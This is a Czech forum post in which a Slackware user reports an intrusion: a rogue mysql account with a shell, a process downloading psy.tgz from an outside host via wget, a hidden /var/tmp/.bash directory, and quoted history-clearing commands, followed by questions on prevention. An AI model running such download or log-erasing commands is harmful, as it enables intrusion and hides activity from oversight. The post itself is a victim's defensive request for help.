Administrace komentářů

Používám Slackware 10.0.
Jádro distribuční s jedinou drobnou úpravou.
Většina software pochází z distribučních balíčků, ale mám i nějaké kompilované ze zdrojových kódů a předkompilované z http://linuxpackages.net/.

Včera večer jsem pracoval na počítači a zůstal jsem připojený k internetu i přes to, že jsem nic nestahoval ani nikde nebrouzdal. Mám externí modem, a tak slyším každý přenos dat. Asi po hodině ticha najednou začal modem pracovat (typické skřípění, nebo šumění z reproduktoru modemu). Když jsem si toho po chvíli všiml, začal jsem pátrat po tom, co je tomu příčinou. Nejprve mě napadl poštovní klient, ale nebyl spuštěný. Spustil jsem tcpdump a odchytil nějaké spojení na adresu http://sigma.hostingfacile.net/. Dalším krokem bylo spuštění ps aux kde jsem ve výpisu našel přihlášeného uživatele mysql. Vzhledem k tomu, že počítač využívám sám a MySql jako službu mám vypnutou, byla pro mě návštěva uživatele mysql opravdovým překvapením. Při dalším výpisu ps aux už na mě "vybafl" uživatel mysql připojený hned několikrát. A co víc! Jeden z jeho procesů byl wget -c http://sufletl.home.ro/psy.tgz. A to byl právě ten okamžik, kdy jsem s velkou silou vytrhl kabel z modemu.

Po odpojení jsem chvíli přemýšlel a vydal jsem se na průzkum napáchaných škod. Nejprve do /etc/passwd, kde jsem objevil toto:

mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash

Přihlásil jsem se jako uživatel mysql a hledal v domovském adresáři /var/lib/mysql soubor .bash_history, ale kromě mých databází tam nic nebylo. Že by něco takového?:

unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null

Smazal jsem uživatele mysql a připojil k internetu a za neustálého kontrolování přenosu jsem stáhl inkriminovaný soubor psy.tgz. Myslel jsem, kdovíco najdu, ale jde o celkem běžný soft. Trochu googlu a našel jsem tohle. Po přečtení reakcí jsem narazil na exploit, ale z toho nejsem dvakrát moudrý.

Taky jsem proběhl všechny tmp adresáře a ve /var/tmp/ jsme objevil adresář .bash, který odpovídá obsahu psy.tgz. Je s podivem, že tam byl celý když jsem viděl jak se stahuje... leda bych připojení ukončil těsně po stažení.

Otázky zní:
Jak získal útočník přístup do mého počítače?
Jak tomu napříště zabránit?
Jaké kroky podniknout?
Stala by se to, i kdybych použil pouze distribuční software - chyba v zabezpečení software třetích stran?
Co jsem zanedbal?
Jak jsou na tom jiné distribuce? Mandrake?
Co si o tom myslíte?

Jistě je pravdou, že správný administrátor systému by situaci neměl nechat dojít až do tohoto stavu a měl by ji předcházet. Především pravidelnou aktualizací a bezpečnostními záplatami. Stalo se.
Připojuji se teď k internetu s velkou opatrností, spouštím okamžitě tcpdump a neustále kontroluji spuštěné procesy. A to rozhodně není nic příjemného. Budu rád, podělíte-li se se mnou o své zkušenosti, nápady a rady.